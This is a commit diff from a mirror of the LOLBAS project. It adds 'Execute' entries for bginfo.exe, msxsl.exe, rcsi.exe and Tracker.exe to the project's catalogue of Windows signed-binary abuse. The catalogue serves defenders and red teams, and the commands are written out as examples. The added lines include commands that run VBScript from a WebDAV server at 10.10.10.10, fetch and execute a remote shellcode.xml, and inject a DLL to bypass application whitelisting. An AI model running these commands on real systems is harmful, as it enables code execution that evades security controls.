mirror of
https://github.com/LOLBAS-Project/LOLBAS
synced 2024-12-25 14:29:24 +01:00
Adding 'Execute' categories to existing 'AWL Bypass' binaries.
This commit is contained in:
parent
92a20a2d6f
commit
c103cb3677
@ -4,6 +4,14 @@ Description: Background Information Utility included with SysInternals Suite
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Commands:
|
||||
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
Usecase: Local execution of VBScript
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Description: Execute VBscript code that is referenced within the bginfo.bgi file.
|
||||
Usecase: Local execution of VBScript
|
||||
@ -12,6 +20,14 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: Execute bginfo.exe from a WebDAV server.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: \\10.10.10.10\webdav\bginfo.exe bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: Execute bginfo.exe from a WebDAV server.
|
||||
@ -20,6 +36,14 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: \\live.sysinternals.com\Tools\bginfo.exe \\10.10.10.10\webdav\bginfo.bgi /popup /nolicprompt
|
||||
Usecase: Remote execution of VBScript
|
||||
Description: This style of execution may not longer work due to patch.
|
||||
@ -39,4 +63,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Oddvar Moe
|
||||
Handle: '@oddvarmoe'
|
||||
---
|
||||
---
|
||||
|
@ -4,6 +4,14 @@ Description: Command line utility used to perform XSL transformations.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Commands:
|
||||
- Command: msxsl.exe customers.xml script.xsl
|
||||
Description: Run COM Scriptlet code within the script.xsl file (local).
|
||||
Usecase: Local execution of script stored in XSL file.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: msxsl.exe customers.xml script.xsl
|
||||
Description: Run COM Scriptlet code within the script.xsl file (local).
|
||||
Usecase: Local execution of script stored in XSL file.
|
||||
@ -12,6 +20,14 @@ Commands:
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: msxls.exe https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml https://raw.githubusercontent.com/3gstudent/Use-msxsl-to-bypass-AppLocker/master/shellcode.xml
|
||||
Description: Run COM Scriptlet code within the shellcode.xml(xsl) file (remote).
|
||||
Usecase: Local execution of remote script stored in XSL script stored as an XML file.
|
||||
|
@ -4,6 +4,14 @@ Description: Non-Interactive command line inerface included with Visual Studio.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Commands:
|
||||
- Command: rcsi.exe bypass.csx
|
||||
Description: Use embedded C# within the csx script to execute the code.
|
||||
Usecase: Local execution of arbitrary C# code stored in local CSX file.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: rcsi.exe bypass.csx
|
||||
Description: Use embedded C# within the csx script to execute the code.
|
||||
Usecase: Local execution of arbitrary C# code stored in local CSX file.
|
||||
@ -23,4 +31,4 @@ Resources:
|
||||
Acknowledgement:
|
||||
- Person: Matt Nelson
|
||||
Handle: '@enigma0x3'
|
||||
---
|
||||
---
|
||||
|
@ -4,6 +4,14 @@ Description: Tool included with Microsoft .Net Framework.
|
||||
Author: 'Oddvar Moe'
|
||||
Created: '2018-05-25'
|
||||
Commands:
|
||||
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
|
||||
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
|
||||
Usecase: Injection of locally stored DLL file into target process.
|
||||
Category: Execute
|
||||
Privileges: User
|
||||
MitreID: T1218
|
||||
MitreLink: https://attack.mitre.org/wiki/Technique/T1218
|
||||
OperatingSystem: Windows
|
||||
- Command: Tracker.exe /d .\calc.dll /c C:\Windows\write.exe
|
||||
Description: Use tracker.exe to proxy execution of an arbitrary DLL into another process. Since tracker.exe is also signed it can be used to bypass application whitelisting solutions.
|
||||
Usecase: Injection of locally stored DLL file into target process.
|
||||
|
Loading…
Reference in New Issue
Block a user